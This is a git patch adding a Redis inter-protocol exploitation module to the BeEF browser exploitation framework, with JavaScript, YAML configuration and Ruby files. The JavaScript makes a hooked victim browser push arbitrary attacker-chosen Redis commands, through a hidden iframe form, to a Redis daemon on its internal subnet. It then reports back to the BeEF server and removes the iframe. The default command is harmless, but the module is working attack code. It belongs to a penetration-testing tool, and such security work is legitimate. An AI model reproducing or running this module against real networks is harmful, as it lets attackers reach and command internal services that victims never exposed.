From 1f83c2a63fcb92a0a96c41daed333966b3c6f38c Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 8 Jan 2014 22:22:22 +1030
Subject: [PATCH] Add Redis IPEC module

---
 modules/ipec/inter_protocol_redis/command.js  | 46 +++++++++++++++++++
 modules/ipec/inter_protocol_redis/config.yaml | 17 +++++++
 modules/ipec/inter_protocol_redis/module.rb   | 24 ++++++++++
 3 files changed, 87 insertions(+)
 create mode 100644 modules/ipec/inter_protocol_redis/command.js
 create mode 100644 modules/ipec/inter_protocol_redis/config.yaml
 create mode 100644 modules/ipec/inter_protocol_redis/module.rb

diff --git a/modules/ipec/inter_protocol_redis/command.js b/modules/ipec/inter_protocol_redis/command.js
new file mode 100644
index 000000000..a5b5e4c8c
--- /dev/null
+++ b/modules/ipec/inter_protocol_redis/command.js
@@ -0,0 +1,46 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// validate payload
+	try {
+		var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target host
+	var rhost = "<%= @rhost %>";
+	if (!rhost) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+		return;
+	}
+
+	// validate target port
+	var rport = "<%= @rport %>";
+	if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+		return;
+	}
+
+	// validate timeout
+	var timeout = "<%= @timeout %>";
+	if (isNaN(timeout)) timeout = 30;
+
+	// send commands
+	var redis_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", cmd);
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Redis commands sent');
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(redis_ipec_form_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout * 1000);
+
+});
+
diff --git a/modules/ipec/inter_protocol_redis/config.yaml b/modules/ipec/inter_protocol_redis/config.yaml
new file mode 100644
index 000000000..ecb616a13
--- /dev/null
+++ b/modules/ipec/inter_protocol_redis/config.yaml
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        inter_protocol_redis:
+            enable: true
+            category: "IPEC"
+            name: "Redis"
+            description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Redis daemon on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the Redis commands are not returned to BeEF.<br/><br/>Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]
+                unknown: ["S", "O"]
diff --git a/modules/ipec/inter_protocol_redis/module.rb b/modules/ipec/inter_protocol_redis/module.rb
new file mode 100644
index 000000000..b9fc596cd
--- /dev/null
+++ b/modules/ipec/inter_protocol_redis/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Inter_protocol_redis < BeEF::Core::Command
+  
+  def self.options
+    cmd = 'set server:name "BeEF says:\\\\nm00!"\\nquit\\n'
+    return [
+	{'name'=>'rhost',   'ui_label'=>'Target Address', 'value'=>'127.0.0.1'},
+	{'name'=>'rport',   'ui_label'=>'Target Port',    'value'=>'6379'},
+	{'name'=>'timeout', 'ui_label'=>'Timeout (s)',    'value'=>'15'},
+	{'name'=>'commands','ui_label'=>'Redis commands', 'description'=>"Enter Redis commands to execute. Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines.", 'type'=>'textarea', 'value'=>cmd, 'width'=>'200px' }
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result'] if not @datastore['result'].nil?
+    content['fail']   = @datastore['fail']   if not @datastore['fail'].nil?
+    save content
+  end
+end